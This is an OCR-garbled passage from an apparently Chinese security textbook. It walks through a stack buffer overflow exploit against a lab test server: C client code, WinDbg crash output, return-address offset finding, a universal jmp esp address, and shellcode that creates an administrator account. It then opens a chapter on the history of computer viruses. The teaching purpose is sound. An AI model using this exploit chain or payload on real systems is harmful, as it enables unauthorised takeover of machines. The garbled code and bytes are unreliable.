menset(Exploit buffer,"A" ,sizeof(Exploit buffer));. аена! puffer 付 值 为 8 
send(s,Exploit buffer,sizeoF(Fxploit buffer),NULL) 

printf("send okWn"); 

closesocket(s); 

WSRCleanup(); 

return 0; 











图 8-57 ”构造 Client 程 序 
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其 实 很 简单 ， 通 过 建立 套 接 字 与 目标 JP 端口 实现 连接 ， 然 后 通过 memset 对 一 个 
1024byte 大 小 的 Exploit_buffer 赋 值 ， 这 个 Exploit_buffer 就 是 要 发 送 的 字符 串 ， 最 后 通过 
send 函 数 将 字符 串 发 过 去 ， 在 编译 之 后 输入 命令 发 送 这 个 字符 串 。 这 里 要 说 明 一 下 ， 在 虚 
拟 机 中 可 以 用 另外 一 个 虚拟 机 对 这 个 虚拟 机 进行 连接 ， 只 要 能 ping 通 就 可 以 ， 这 里 为 了 省 
事 ， 就 直接 向 127.0.0.1 本 地 发 送 ， 如 图 8-58 所 示 。 


























C:\Documents and Settings dninistrator>"C 


xploitme*Debug*exploitme.exe 





图 8-58 “Client 程序 连接 测试 
从 图 8-58 可 以 看 到 这 个 字符 串 连接 成 功 ， 那 么 看 看 在 接收 端 发 生 了 什么 〈 见 图 
8-59) ， 记 得 要 挂 载 WinDbg ( 见 图 8-60) 。 


PE PEPE н э ж э эе ж э э E ж DE ж DE DE E ж ж ж э ж ж ж ME DEE ж 


exploit target server 1.8 


ПААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 
ПААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
hhnnnnnnnnnnnnnnnnnnnnnnnnnnnnnneeeeuWinSock 2.0 





图 8-59 ”Server 程 序 接收 畸形 字符 串 


JULULUdL. /1dUUUUU /1dUOUUU U. MWLINUUWO NOYSUENMIC WSULUPIP. ULL 


(53c.30c): Access violation - code с0000005 (!!! second chance !!! 
зах=00409а68 ebx-00000080 ecx-00410e20 edx-00000000 esi-00000200 edi-0012fdf4 
вір=41414141 esp-0012fbbc ebp-00000064 іор1=0 nv up ei pl nz na pe nc 


2s-Ü001b ss=0023 ds=0023 еѕ=0023 £fs-003b gs=0000 ef 1=00000206 
41414141 ?? ??? 


图 8-60 ”WinDbg 跟 踪 漏洞 触发 位 置 

接收 端 收 到 了 一 大 串 A， 即 我 们 构造 的 Exploit_buffer 中 的 内 容 ， 同 时 WinDbg 又 跳 了 
出 来 ， 程 序 崩 演 了 。EIP 指 向 41414141， 这 是 一 片 无 效 的 内 存 地 址 ， 而 41 正 是 A 的 ASCII 码 
(十 六 进 制 ) ， 漏 洞 果然 存在 ， 我 们 调用 kb 可 以 看 看 被 破坏 的 栈 中 的 内 容 〈 见 图 8-61) 。 

至 此 可 以 确定 ， 超 长 串 的 字符 确实 可 以 造成 漏洞 的 触发 ， 问 题 函 数 就 是 sub 401000. 
接 下 来 要 确定 溢出 点 在 什么 位 置 ， 只 有 找到 了 确定 的 地 址 ， 才 可 以 正确 地 构造 返回 地 址 
及 覆盖 shellcode， 这 里 省 去 了 在 栈 中 调试 的 过 程 ， 其 实 就 是 用 memory 查 看 内 存 覆 盖 
的 情况 ， 根 据 当 前 esp 的 地 址 0012fbb8 以 及 字符 串 起 始 的 位 置 来 计算 长 度 究竟 是 多 少 ， 
最 后 可 以 知道 漏洞 的 位 置 在 字符 串 的 第 201 个 字 ， 也 就 是 最 开始 的 v17[201] 开 始 出 了 问 
题 ， 于 是 将 POC 的 目标 位 置 改 成 其 他 字符 ， 来 确定 漏洞 是 否 在 那个 地 方 被 触发 (如 图 
8-62 所 示 ) 。 











n 
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ChildEBP 
WARNING: 

0012fbb8 
0012fbbc 
0012fbc0 
0012#Ьс4 
0012fbc8 
0012fbcc 
0012fbd0 
0012fbd4 
0012fbd8 
0012fbdc 
0012fbe0 
0012fbe4 
0012fbe8 
0012fbec 
0012#Ь#0 
0012fbt4 
0012fbf8 
0012fbfc 
0012#с00 
0012fc04 





Oe. 610): 


0:000» kb 


Retàddr 
Frame IP 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


nenset(Exploi 


Àrgs to Child 
not in any known module. Following frames may be wrong. 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
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0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 
0х41414141 


图 8-61 WinDbg 查 看 漏洞 触发 时 内 存 空间 情况 


ъи апел сое 





for(i=0;i<200;i++) 


‹ 


Exploit_buffer[i]='A"; 


》 


Exploit buffer[280]-0xcc; 
Exploit buffer[201]-0xcc; 
for(i-202;i«sizeoF(Exploit buffer)gie«) 


Exploit buffer[i]e'a'; 


buffer,8,sizeof(Exploit buffer));//ÍGgexploit buFferlf[A 27а 


图 8-62 从 POC 到 exploit 
这 里 将 Exploit_buffer 的 第 200 和 201 位 置 的 元 素 改 成 cccc， 这 里 用 0xcc 是 因为 不 知道 
怎么 输入 cc 对 应 ASCII 码 的 内 容 ， 用 0xcc 表 示 效 果 相 同 ， 此 时 笔者 再 次 将 这 个 程序 发 送 过 

去 WinDbg 又 跳 了 出 来 ， 这 次 显示 的 结果 如 图 8- 63 所 示 。 


pip 
=P RN 一 ap "0000005 ПИ Pan Chance п) 


еах=00409а68 ebx-00000080 есх=00410е20 edx-00000000 esi-00000200 edi=0012fdf4 
leip-4l4lcccc esp=0012fbbc ebp=00000064 iopl=0 


cs=001b ss=0023 ds-0023 PC 0023 


4141cccc ?? 
0:000> dd esp 


继续 查看 栈 内 的 内 容 〈 见 图 8- 


nv up ei pl nz па pe пс 


fs-003b gs=0000 etl-00000206 





图 8-63 ”RET 地 址 的 定位 

为 什么 是 4141cccc 呢 ?这 与 栈 的 操作 有 关 ， 其 实 就 是 低地 址 向 高 地 址 排列 ， 就 好 像 笔 
者 输入 01020304 时 ， 到 栈 内 就 成 了 04030201。 至 此 ， 可 以 确定 栈 溢出 发 生 时 的 问题 了 ， 其 
实 真实 情况 如 图 8-64 所 示 。 


Mus: 16 
"ү 196« 


ЕВР-> 数据 197-200« 
返回 地 址 -> 数据 201-204* 


图 8-64 ” 栈 溢 出 时 的 情况 
65) 


ChildEBP Retàddr  Àrgs to Child 
WARNING: Frame IP not in any known module. Following frames may be wrong 
0012fbb8 41414141 41414141 41414141 41414141 0х4141сссс 
0012fbbc 41414141 41414141 41414141 41414141 0х41414141 


图 8-65 


BARS 


167 一 一 





п — 
= m 


N ASS 











黑客 与 安全 技术 指南 
至 此 可 以 完全 地 确定 这 次 exploit 应 该 如 何 完成 了 。 这 里 将 这 个 返回 地 址 修改 成 jmp esp 











地 址 ， 然 后 将 esp 也 就 是 0012fbbc 后 的 内 容 改 成 我 们 的 shellcode ( 见 图 8-66) ， 就 能 完成 这 
次 exploit 了 ( 见 图 8-67) 。 


char shellcode[]-"Xx31Xxd2Xxb2Xx30Xx65Xx8DXx 12XX8DVx52XXx BCXX8DVx52Xx 1OXXBDX x42" 

"AX 88XX8DVx72Vx2 UXX8DXXx 12Xx8ÜXx ZeXX BCVX33XX75XX F2VX89X xc 7Xx 83" 
U"AX78XX9CXX8DXX57XX78Xx 81\хс2\х86\х7а\х20\х61\хс7\х31\хеа\х8ь" 
"\хЗн\ха\х@1\хсб\хнӊ5\х81\хЗе\х57\х69\хбе\хн5\х75\х#2\х8һ\х7а'" 
"\х2н\хй1\хс7\хбб\х8һ\х2с\хб\х8Ь\х7а\х1с\хЁ1\хс7\х8һ\х7с\ха'" 
"\хЕс\х@1\хс7\хбВ\х!н\хЗЗ\хбе\х@1\хб8\х28\хн2\х72\х6Е\хб8В\х2Е'"' 
AKHAN XHA \хбВ\хбЕ\х?72\х73З\х28\хб8В\х7н\х72\хб1\х7н\хб8\хб9'" 
"\хбе\хб9\х7З\хб8\х2@\хн1\хбн\хба\хбВ\х72\хбЕ\х75\х7 0\х68\х63" 
U"NX61NX6CXX67XX68XX7XX2 В\хбс\хбғ\хб8\х26\х2 8\хбе\хб5\хб8\хн' 
UAXBINX2 0Xx26NX68Xx6eXX2 0NX2£XX1NX68XX 72XX6FXXDXx33Xx68Nx32'* 
"NAX6eXX20Nx 2XX68XX2XX 72XX6FXX IDVXX68XX 73NX65Nx72Xx2 NX68Vx65** 
"NX 78Nx20Nx75NX68XX2£XX63Xx2 @\хбе\хб8\хб5\х78\хб5\х2 0Nx68Nx62'* 
"Ax6dNx654Xx2eXx89Xxe5XNx FeXxhdVx53NXx91V xc 0Nx5 Nx 55Xx FFAxd7'; 


8-66 ”shellcode 的 构造 


/// 给 buff 赋 值 ,构造 shellcode 

menset(Exploit buffer,0,sizeof(Exploit buffer));//iSexploit buffer 
for(i=0;i<200;i++) 

Hi 








Exploit buffer[i]-'R'; 
› 
Exploit buffer[208]-0x12; 
Exploit buffer[201]-0x45; 
Exploit buffer[202]-0xfa; 







Exploit buffer[203 
For(i-20h;i€sizeof 
Exploit buffer[i]s 
for(i=208+sizeof 
Exploit_buffer[i]= 


7f; 
ellcode);i++) 





llcode);i<sizeof(Exploit_buffer);i++) 


图 8-67 ”exploit 完 成 
上 面 的 shellcode 部 分 是 笔者 在 exploit-db 上 找 的 ， 其 功能 是 在 目标 计算 机 上 建立 一 个 
名 为 broK3n 的 用 户 ， 该 用 户 具 有 Administrator 权 限 。 当 然 ， 这 个 shellcode 也 可 以 换 成 其 他 
的 ， 正 如 笔者 刚才 所 讲 ， 将 对 应 的 返回 地 址 修改 成 1245fa7f， 到 了 栈 里 就 成 了 7ffa4512， 
这 是 一 个 通用 的 jmp esp 跳 转 地 址 ， 到 Windows 7 下 仍然 可 以 使 有 用， 屡试不爽 。 接 下 来 覆盖 
shellcode， 由 于 shellcode 大 小 是 194 字 ， 前 面 是 204 字 ， 总 大 小 是 512 字 ， 不 会 超过 字符 串 的 
布置 大 小 。 在 发 送 过 去 之 后 ， 接 收 端 显 示 的 是 图 8-68 所 示 的 内 容 。 





图 8-68 ”Server 接 收 exploit 
打开 计算 机 的 用 户 列表 ， 如 图 8-69 所 示 。 
| ESL 全 名 Takt 
Ж һаілізіг... SERT 


an... HE 


图 8-69 漏洞 发 生 后 远程 添加 Administrator 用 户 
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BroK3n 已 经 出 现在 计算 机 的 用 户 列 表 中 了 。 当 然 ， 这 些 shellcode 还 能 完成 反弹 shell、 
下 载 执 行 指定 程序 等 内 容 ， 这 些 shellcode 的 编写 方法 ， 可 以 在 论坛 中 与 大 家 一 起 交流 。 

到 这 里 ， 对 一 台 计 算 机 的 exploit 完 成 了 。 这 只 是 一 个 简单 的 程序 ， 如 果 有 人 对 这 个 过 
程 感 兴趣 ， 笔 者 可 以 将 这 个 程序 提供 给 大 家 。 在 此 想 说 的 是 这 个 程序 非常 简单 ， 假 如 计算 
机 中 在 运行 某 些 运营 商 的 某 些 网 络 服务 ， 而 那个 网 络 服务 存在 一 个 远程 执行 代码 的 漏洞 ， 
那么 黑客 就 可 以 通过 上 面 的 这 些 操作 完成 对 计算 机 的 控制 ， 其 后 果 是 很 严重 的 。 笔 者 只 是 
将 黑客 所 有 复杂 的 操作 简化 下 来 ， 精 简 之 后 就 是 上 面 所 讲 的 内 容 。 虽 然 如 今 的 计算 机 存在 
DEP、UAC 等 防护 ， 即 使 如 此 ， 有 些 黑客 大 牛 们 仍然 能 利用 各 种 高 深 的 技巧 绕 过 防护 。 


读者 从 整个 分 析 中 可 以 知道 ， 计 算 机 的 攻击 与 防护 需要 熟练 使 用 各 种 工具 软件 ， 通 过 
使 用 汇编 和 CMD 命 令 可 以 了 解 漏洞 是 如 何 产生 的 ， 不 但 使 用 C 语 言 可 以 完成 对 exploit 的 编 
写 工 作 ， 而 且 使 用 Python 和 Ruby 也 能 完成 相同 的 功能 。 攻 击 与 防护 工作 绝 不 是 使 用 单一 语 
言 、 单 个 工具 软件 就 能 完成 的 工作 ， 必 须要 经 过 长 期 的 学 习 与 研究 。 

读者 在 学 习 的 过 程 中 会 发 现 ， 与 内 存 打 交道 其 实 并 不 是 一 件 枯燥 的 事情 ， 想 象 一 下 在 
广 衰 的 内 存 空间 中 驰 驻 ， 在 自由 控制 指针 、 控 制程 序 的 时 候 ， 是 不 是 有 种 一 切 尽 在 掌控 的 

感觉 ， 个 中 乐趣 只 有 随 着 逐渐 地 深入 研究 之 后 才能 体会 。 

黑客 攻防 这 条 路 并 没有 想象 中 那么 难 走 ， 关 键 在 于 乐趣 。 如 果 读者 真心 想 学 习 逆向 分 
析 、 漏 洞 挖掘 与 漏洞 分 析 ， 并 能 写 出 exploit 程 序 ， 从 而 完成 一 次 缓冲 区 溢出 攻击 。 第 一 ， 
要 能 耐 得 住 寂寞 。 当 读者 花 数 小 时 沉浸 在 内 存 空 间 的 时 候 ， 就 是 一 个 编程 “修行 ”的 过 
程 ， 同 时 也 会 发 现 沉浸 其 中 是 多 么 地 其 乐 无 穷 。 第 二 ， 就 是 要 多 学 习 、 多 交流 。 黑 客 绝 
对 不 是 只 会 拿 着 工具 的 “脚本 小 子 ”， 无 论 是 web、 应 用 、 移 动 或 者 其 他 ， 都 需要 静心 学 
习 。 心 浮 气 躁 只 能 浪费 自己 的 时 间 ， 很 多 前 辈 们 都 经 历 过 弯路 ， 多 跟 技 术 大 牛 交流 可 以 事 
半 功 倍 ， 少 走 弯路 。 第 三 ， 是 要 保持 兴趣 。 兴 趣 永远 是 最 好 的 老师 ， 保 持 对 事物 的 兴趣 可 
以 让 自己 坚持 ， 坚 持 ， 再 坚持 。 
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关于 病毒 的 研究 和 基于 病毒 的 攻防 技术 ， 在 计算 机 领域 非常 重要 。 本 章 是 一 个 “大 ” 
章节 ， 内 容 较 多 ， 看 上 去 较 难 ， 建 议 读者 勤 做 笔记 ， 跟 着 笔者 一 起 实践 、 分 析 ， 一 定 会 发 
现 病毒 的 魅力 。 





9.1 计算 机 病毒 概述 


9.1.1 计算 机 病毒 的 定义 


计算 机 病毒 ， 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ， 影 
响 计算 机 使 用 ， 并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 (摘自 《中 华人 民 共 和 国 计 
算 机 信息 系统 安全 保护 条 例 》 第 二 十 八条 ) 。 

计算 机 病毒 是 一 个 程序 或 一 段 可 执行 代码 ， 就 像 生 物 病毒 一 样 具 有 自我 繁殖 、 互 相传 
染 以 及 激活 再 生 等 生物 病毒 特征 。 计 算 机 病毒 有 独特 的 复制 能 力 ， 它 们 能 够 快速 蔓延 ， 又 
常常 难以 根除 。 计 算 机 病毒 能 把 自身 附着 在 各 种 类 型 的 文件 上 ， 当 文件 被 复制 或 从 一 个 用 
户 传送 到 另 一 个 用 户 时 ， 它 们 就 随同 文件 一 起 蔓延 开 来 。 

实际 上 ， 计 算 机 病毒 就 是 人 类 通过 研究 病毒 仿生 学 ， 作 用 于 计算 机 ， 通 过 计算 机 指令 或 
者 程序 代码 ， 破 坏 计算 机 系统 从 而 获得 对 病毒 制造 者 来 说 有 件 利 价值 的 信息 的 工具 手段 。 

综 上 所 述 ， 计 算 机 病毒 并 不 神秘 ， 因 为 它 只 是 一 段 计算 机 指令 或 者 程序 代码 ， 也 就 是 
说 只 要 读者 学 过 一 门 计算 机 语言 ， 就 拥有 编写 计算 机 病毒 的 语言 基础 ， 但 是 没有 编写 病毒 
的 能 力 ， 因 为 对 计算 机 病毒 的 逻辑 原理 、 运 行规 则 没有 一 定 的 认 知 。 本 章 将 详细 讲述 计算 
机 病毒 的 原理 、 行 为 以 及 对 计算 机 病毒 的 防范 ， 从 源码 上 探秘 ， 从 行为 上 分 析 计 算 机 病毒 
是 如 何 制造 并 投入 运行 ， 进 而 使 读者 从 中 获得 对 于 病毒 防范 手段 的 启发 ， 并 激发 读者 对 于 
软件 安全 的 兴趣 与 热情 。 





9.4.2 计算 机 病毒 的 起 源 与 发 展 


谈 及 计算 机 病毒 的 起 源 ， 不 得 不 提 及 享有 伟大 数学 家 、 现 代 计 算 机 创始 人 名 誉 的 
约翰 。 冯 “。 诺 伊 曼 (John von Neumann) ， 他 在 1945 年 提交 了 改进 ENIAC (Electronic 
Numerical Integrator And Calculator) 设计 方案 ， 引 入 了 运算 器 、 逻 辑 控 制 装置 、 存 储 器 、 
输入 和 输出 设备 的 概念 ， 并 且 于 1949 年 发 表 的 一 篇 学 术 论文 《自我 繁衍 的 自动 机 理论 》 

(Theory of Self-Reproducing Automata) 中 提出 计算 机 程序 能 够 在 内 存 中 进行 自我 复制 ， 
这 就 为 计算 机 病毒 的 控制 设备 以 及 在 内 存 中 运行 、 复 制 莫 定 了 坚实 的 理论 基础 。 

在 1960 年 初 ， 贝 尔 实验 室 的 三 个 年 轻 程 序 员 用 汇编 语言 玩 起 了 一 个 游戏 ， 也 就 是 著名 
的 “ 磁 芯 大 战 ” 运用 汇编 语言 编写 的 破坏 对 手 的 程序 ， 表 现 出 了 病毒 的 感染 性 ， 也 体 
现 出 计算 机 病毒 概念 的 雏形 。 

1977 年 托马斯 。 捷 。 瑞 安 (Thomas.J.Ryan) 的 科幻 小 说 《P-1 的 春天 》 (The 
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Adolescence of P-1) ， 描 绘 出 病毒 在 计算 机 中 相互 感染 并 最 终 控 制 了 7000 台 计算 机 的 灾难 
情节 ， 并 且 把 这 种 病毒 第 一 次 称 为 “计算 机 病毒 ”。 

1983 年 11 月 3 日 ， 美 国 南 加 州 大 学 的 学 生 弗 雷 德 。 科 恩 (Fred Cohen) ， 后 来 被 誉 为 
“计算 机 病毒 之 父 ”， 于 VAX11/750 计 算 机 系统 ， 也 就 是 UNIX 系 统 下 编写 并 运行 了 一 个 
具有 自我 复制 功能 ， 可 在 计算 机 间 传 染 令 操作 系统 死机 的 程序 。 他 紧 接着 于 一 周 后 又 进行 
了 5 次 实验 ， 得 出 了 计算 机 病毒 确实 存在 的 结论 。 他 的 导师 伦 ， 艾 德 勒 曼 (Len Adleman) 
将 它 命名 为 计算 机 病毒 。 科 恩 通过 不 懈 地 研究 与 思考 ， 于 1987 年 发 表 了 一 篇 龙 动 世界 的 博 
士 论文 《计算 机 病毒 》， 该 论文 第 一 次 从 真正 意义 上 提出 了 计算 机 病毒 的 概念 。 

1986 年 ， 巴 基 斯 坦 擅长 软件 编写 的 两 兄弟 为 了 打击 盗版 软件 的 使 用 者 ， 编 写 了 世界 上 
最 早 在 个 人 计算 机 上 广泛 传播 的 病毒 一 一 巴基斯坦 病毒 (C-Brain) ， 也 是 世界 上 第 一 例 
具有 真正 意义 的 计算 机 病毒 。 该 病毒 运行 于 DOS 系 统 下 ， 功 能 是 当 用 户 非法 拷贝 软件 时 ， 
“ 吃 掉 ” 用 户 硬盘 的 剩余 空间 。 

1987 至 1989 年 ， 针 对 DOS 系 统 的 病毒 (黑色 星期 五 、IBM 圣 诞 树 等 ) 在 世界 范围 内 
流行 ， 我 国 也 出 现 了 能 够 感染 硬盘 和 软盘 引导 区 的 stoned 病 毒 ， 该 病毒 体 代码 中 有 明显 的 标 
志 一 一 YourPCisnow Stoned! LEGALISE MARIJUANA! ， 该 病毒 也 称 为 “大 麻 病毒 ”。 

20 世 纪 90 年 代 ， 随 着 Windows 系 统 的 普及 ，Windows 系 统 下 的 病毒 也 是 愈 来 愈 多 ， 其 
中 著名 的 有 1996 年 的 宏 病 毒 和 1998 年 的 CIH 病 毒 。 

宏 病 毒 主要 感染 对 象 为 微软 公司 的 Office 办 公 软 件 ， 如 Word、Excel 等 ， 一 旦 打开 感染 
了 宏 病 毒 的 文档 ， 其 中 具有 病毒 感染 效应 的 宏 就 会 被 执行 ， 宏 病毒 就 会 转移 到 计算 机 中 ， 
寄生 在 Normal 模 板 上 ， 并 且 会 带 有 恶意 地 阻止 用 户 正常 使 用 Office 软 件 ， 该 病毒 主要 借助 
存在 于 Intemet 上 的 文档 进行 传播 。 

CIH 病 毒 的 危害 更 加 巨大 ， 它 对 于 Windows 95/98 系 统 拥有 毁灭 性 的 破坏 力 。CIH 病 毒 
针对 Win32 系 统 ， 感 染 EXE 文 件 ， 属 于 文件 型 病毒 ， 于 每 年 的 4 月 26 日 CCIH V1.2) 、6 月 
26H (CIH V1.3) 、 每 月 的 26 日 (CIH V1.4) 运行 发 作 ， 它 将 破坏 硬盘 数据 ， 同 时 会 对 某 
些 主板 上 的 Flash Rom 中 的 BIOS 进 行 破坏 ， 使 物理 硬盘 损坏 或 主板 损坏 ， 最 终 导致 计算 机 
无 法 正常 启动 ， 运 行 。 

就 在 1998 年 底 ，Happy99 网 络 蠕虫 病毒 一 一 完全 通过 Internet 传 播 的 病毒 诞生 。 该 病毒 
通过 邮件 传播 ， 病 毒 运行 后 ， 屏 幕 上 出 现 绚丽 烟花 效果 ， 并 显示 Happy New Year 19991! 的 
标题 ， 以 庆祝 1999 年 的 到 来 ， 并 于 后 台 悄 悄 运行 ， 干 扰 邮 件 的 正常 收发 。 

随后 在 1999 年 3 月 ， 梅 丽 莎 病 毒 (Melissa， 创 作 于 1998 年 春天 ， 最 早 可 以 通过 邮件 传 
播 的 病毒 ) 爆发 ， 这 是 世界 上 第 一 例 以 邮件 方式 进行 传播 的 病毒 。 邮 件 收 件 人 会 收 到 标 
题 主要 为 Important Message From xxx (xxx 为 用 户 名 ) ， 内 容 为 Here is that document you 
asked for ... don't show anyone else; -) 的 邮件 ， 一 旦 收 件 人 打开 邮件 ， 洪 伏 在 文档 中 的 
宏 病 毒 梅 丽 莎 就 会 改作 ， 自 动向 用 户 通讯 录 的 前 50 位 好 友 复 制 发 送 携带 病毒 文档 的 
邮件 。 

2000 年 2 月 ， 一 种 名 为 分 布 式 拒绝 服务 攻击 (DDOS) 的 攻击 方式 大 规模 爆发 ， 先 后 
使 Yahoo、 亚 马 进 、CNN 等 网 站 毅 溃 瘫痪 。 同 年 名 为 “ 爱 虫 ” (Love letter) 的 由 VBS 脚 本 
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语言 编写 的 病毒 通过 邮件 大 肆 传 播 ， 病 毒 以 邮件 传播 的 方式 又 达到 一 个 新 的 高 度 。 相 比 于 
梅 丽 莎 病毒 而 言 ， 其 破坏 性 更 大 ， 该 病毒 在 利用 微软 的 Outlook 软 件 传播 病毒 的 同时 ， 还 
可 以 利用 ActiveX 控 件 对 计算 机 用 户 的 本 地 硬盘 文件 进行 读 写 操作 。 

2001 年 ， 蠕 虫 “ 红 色 代 码 ” 与 “ 尼 达 姆 ”相继 爆发 ， 前 者 被 称 为 最 昂贵 的 病毒 之 一 ， 
因 其 利用 微软 Microsoft IIS Web 服 务 器 的 漏洞 COday) 对 计算 机 进行 攻击 ， 并 且 取 得 计算 
机 的 最 高 权限 。 尼 达 姆 病毒 不 仅 利用 漏洞 还 主要 以 邮件 形式 进行 传播 ， 入 侵 了 约 830 万 台 
计算 机 ， 造 成 经 济 损失 高 达 5.3 亿 美元 ， 给 缺乏 邮件 信息 安全 意识 的 计算 机 用 户 们 上 了 生 
动 的 一 课 ， 网 络 蠕虫 引发 的 安全 问题 自 此 得 到 了 人 们 的 重视 。 同 时 ， 国 内 知名 远程 控制 软 
件 “ 灰 鸽子 ”被 制作 了 出 来 ， 谁 也 没有 想到 ， 原 本 用 于 家 庭 公司 的 正常 监控 软件 会 在 4 年 
后 成 为 卷 席 中 国 互联 网 安全 界 的 罪魁 祸首 。 

2003 年 ， 冲 击 波 病毒 (Blaster) 席卷 全 球 ， 它 利用 RPC 漏 洞 攻击 TCP135 号 端口 ， 获 得 
操作 系统 的 最 高 权限 ， 进 而 控制 宿主 机 ， 对 其 隐私 进行 非法 窃取 。 据 计算 机 系统 安全 及 服 
务 公 司 赛 门 铁 克 (Symantec) 安全 反应 感应 器 网 络 的 样本 显示 ， 全 球 至 少 有 12.4 万 台 使 用 
微软 窗口 软件 的 计算 机 遭受 感染 。 计 算 机 防毒 软件 厂商 “趋势 科技 ” (TrendMicro) 的 专 
家 说 ，“ 冲 击 波 ”病毒 可 能 感染 了 全 球 一 两 亿 台 计算 机 。 

2004 年 ， 同 样 是 利用 漏洞 进行 攻击 传播 的 震荡 波 〈Sasser) 病毒 肆虐 互联 网 ， 利 用 
Lsass 漏 洞 进行 传播 ， 开 启 中 招 用 户 计算 机 的 128 个 线程 去 攻击 其 他 计算 机 用 户 ， 同 样 造成 
了 巨大 的 经 济 损失 。 也 是 在 这 一 年 内 ， 第 一 例 基于 手机 塞 班 系统 的 蠕虫 病毒 面世 ， 这 就 是 
Cabir 蜂 虫 病毒 ， 这 种 病毒 攻击 对 象 为 诺基亚 S60 系列 、Symbian 操作 系统 的 手机 ， 并 且 利 
用 蓝牙 漏洞 进行 传播 ， 自 此 手机 病毒 也 走 进 和 人们 的 视野 。 

2005 年 ， 各 类 病毒 层出不穷 。 据 金山 反 病毒 监测 中 心 数据 显示 ， 从 2005 年 1 月 到 10 
月 ， 一 共 截 获 或 监测 到 的 病毒 达到 50 179 个 ， 其 中 木马 、 蠕 虫 、 黑 客 病毒 占 其 中 的 91%， 
以 盗 取 用 户 有 价 账号 〈 如 网 银 、QQ、 网 游 ) 的 木马 病毒 为 主 ， 多 达 2000 多 种 ， 如 果 算 上 
变种 则 就 要 超过 一 万 种 ， 平 均 每 天 有 30 个 病毒 出 现 。 远 程控 制 软件 “ 灰 鸟 子 ” (Win32. 
Hack.Huigezi) 被 各 大 杀毒 软件 列 为 年 度 十 大 病毒 之 一 ，“ 灰 饮 子 ”名 声 大 噪 。 庞 大 的 数 
据 也 明确 地 表明 计算 机 病毒 进入 了 一 个 快速 增长 的 爆发 期 。 

2006 年 11 月 ， 感 染 能 力 与 破坏 能 力 极 强 的 “熊猫 烧香 ”病毒 深 深 地 印 入 了 每 一 位 计算 
机 用 户 的 心中 。 能 猫 烧 香 本 质 是 一 个 经 过 多 次 变种 的 蠕虫 病毒 ， 感 染 能 力 极 强 ， 用 户 系统 
正常 的 文件 几乎 都 会 遭 到 病毒 感染 ， 而 用 户 系 统 中 所 有 .exe 可 执行 文件 的 图 标 都 会 被 算 改 
成 举 着 三 根 香 的 大 熊猫 ， 这 也 是 熊猫 烧香 病毒 名 称 的 来 源 。 它 也 会 通过 网 站 /局 域 网 来 传 
播 ， 因 此 熊猫 烧香 病毒 的 传播 速度 极 快 ， 在 短 短 几 个 小 时 内 就 有 几 千 台 计算 机 感染 该 病 
毒 。 虽 然 它 经 过 多 次 变种 ， 但 熊猫 烧香 病毒 的 破坏 能 力也 不 可 忽视 ， 计 算 机 用 户 的 信息 会 
遭 到 窃取 ， 硬 盘 数 据 也 会 遭受 到 破坏 ， 病 毒 会 删除 拓展 名 gho 的 文件 ， 使 得 ghost 软 件 无 法 
恢复 操作 系统 ， 同 样 还 会 杀 掉 各 类 杀毒 软件 的 进程 与 线程 ， 致 使 杀毒 软件 无 效 ， 可 谓 危害 
极 大 。2012 年 1 月 ， 伴 随 着 新 年 的 来 临 ， 熊 猫 烧香 的 变种 病毒 金 猪 报喜 现 身 于 互联 网 ， 它 
和 熊猫 烧香 病毒 不 同 的 是 ， 金 猪 报喜 病毒 将 文件 图 标 变 成 “ 金 猪 报 喜 ”， 借 春节 来 临 人 们 
相互 祝贺 的 时 机 大 肆 传 播 。 由 于 其 具有 熊猫 烧香 的 本 质 ， 故 熊猫 烧香 病毒 专 杀 工 具 就 可 以 
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清除 该 病毒 的 威胁 ， 因 此 没有 造成 巨大 经 济 损失 。 

2007 年 ， 据 瑞星 反 病毒 监测 网 数据 统计 ， 瑞 星 公司 共 截 获 新 病毒 样本 917 839 个 ， 比 
去 年 增加 了 70.7%。 其 中 木马 病毒 580 992 个 ， 后 门 病毒 194 581 个 ， 两 者 之 和 超过 77 万 
个 ， 占 总 体 病 毒 的 84.5%。 其 中 利用 U 盘 等 移动 存储 设备 进行 传播 的 病毒 泛滥 ， 以 帕 虫 
(AV 终 结 者 ，AV is anti-virus) 病毒 、 大 小 姐 病 毒 为 代表 ， 这 些 病毒 的 主要 目的 是 入 侵 系 
统 ， 破 坏 杀 毒 软件 正常 运行 与 盗 取 网 游 、 网 银 等 账号 ， 从 中 件 取 非法 利益 。 

2008 年 ， 病 毒 传播 方式 的 重点 从 移动 存储 设备 转移 到 了 “网 页 挂 马 ”的 形式 ， 用 户 
通过 浏览 被 上 传 了 病毒 的 网 页 ， 或 者 下 载 了 含有 病毒 的 文件 从 而 感染 病毒 ， 因 广大 计算 机 
